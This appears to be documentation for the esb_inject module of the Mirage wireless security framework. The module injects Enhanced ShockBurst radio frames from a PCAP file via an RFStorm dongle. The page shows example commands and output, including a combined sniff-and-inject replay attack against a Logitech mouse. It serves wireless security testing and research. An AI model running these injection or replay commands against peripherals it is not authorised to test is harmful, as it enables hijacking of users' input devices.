esb_inject¶
Presentation¶
esb_inject allows to inject Enhanced ShockBurst frames. It works with a RFStorm Device. It imports the frames stored in a PCAP file (provided as PCAP_FILE parameter) and uses the provided interface to inject them.
You have to provide a target using the TARGET parameter. If no target is provided (or the value provided is “FF:FF:FF:FF:FF”), every frame contained in the PCAP file are transmitted. Else, only the frames corresponding to the provided target will be transmitted. You can choose the injection channel thanks to the CHANNEL parameter. You can provide multiple values :
auto: an active scan is performed in order to find the target
X: the channel X is used
Compatible devices¶
Input parameters¶
Name |
Default value |
Possible values |
Description |
|---|---|---|---|
INTERFACE |
rfstorm0 |
rfstormX |
Interface to use |
TARGET |
<ESB adress> |
Address of the target device |
|
CHANNEL |
auto |
auto|<integer> |
Injection channel |
PCAP_FILE |
<file path> |
PCAP file |
Output parameters¶
This module doesn’t provide any output parameters.
Usage¶
Basic Usage¶
If you want to inject frames to a specific target, you have to provide the TARGET parameter:
$ mirage esb_inject TARGET=E8:46:F9:2F:A4 PCAP_FILE=/tmp/replay.pcap
[INFO] Module esb_inject loaded !
[SUCCESS] PCAP file successfully loaded (DLT : 148) !
[INFO] Sniffing mode enabled !
[INFO] Looking for an active channel for E8:46:F9:2F:A4...
[SUCCESS] Channel found: 17
[INFO] Extracting packet stream from PCAP ...
[SUCCESS] Packet stream successfully extracted !
[INFO] Injecting ...
[SUCCESS] Injection done !
[INFO] Mirage process terminated !
If you don’t provide the TARGET parameter, every frame contained in the PCAP file will be transmitted:
$ mirage esb_inject PCAP_FILE=/tmp/replay.pcap
[INFO] Module esb_inject loaded !
[SUCCESS] PCAP file successfully loaded (DLT : 148) !
[INFO] Promiscuous mode enabled ! Every frame contained in the file indicated in PCAP_FILE will be transmitted.
[INFO] Looking for an active channel for FF:FF:FF:FF:FF...
[SUCCESS] Channel found: 12
[INFO] Extracting packet stream from PCAP ...
[SUCCESS] Packet stream successfully extracted !
[INFO] Injecting ...
[SUCCESS] Injection done !
[INFO] Mirage process terminated !
You can select a specific channel thanks to the CHANNEL parameter :
$ mirage esb_inject TARGET=E8:46:F9:2F:A4 PCAP_FILE=/tmp/replay.pcap CHANNEL=12
[INFO] Module esb_inject loaded !
[SUCCESS] PCAP file successfully loaded (DLT : 148) !
[INFO] Sniffing mode enabled !
[INFO] Extracting packet stream from PCAP ...
[SUCCESS] Packet stream successfully extracted !
[INFO] Injecting ...
[SUCCESS] Injection done !
[INFO] Mirage process terminated !
Performing a replay attack¶
This module can be combined with esb_sniff in order to perform a replay attack:
$ mirage "esb_sniff|esb_inject" esb_sniff1.TARGET=E8:46:F9:2F:A4 esb_sniff1.TIME=5 esb_sniff1.PCAP_FILE=/tmp/replay.pcap
[INFO] Module esb_sniff loaded !
[INFO] Module esb_inject loaded !
[INFO] Sniffing mode enabled !
[SUCCESS] PCAP file successfully loaded (DLT : 148) !
[INFO] Channels: 0-99
[INFO] Looking for an active channel for E8:46:F9:2F:A4...
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-8 | y=3 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-8 | y=3 >>
[SUCCESS] Channel found: 8
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-7 | y=1 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-7 | y=1 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-5 | y=2 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-5 | y=2 >>
[...]
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=255 | y=0 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-3 | y=3 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-3 | y=3 >>
[INFO] Sniffing mode enabled !
[INFO] Extracting packet stream from PCAP ...
[SUCCESS] PCAP file successfully loaded (DLT : 148) !
[SUCCESS] Packet stream successfully extracted !
[INFO] Injecting ...
[SUCCESS] Injection done !
[INFO] Mirage process terminated !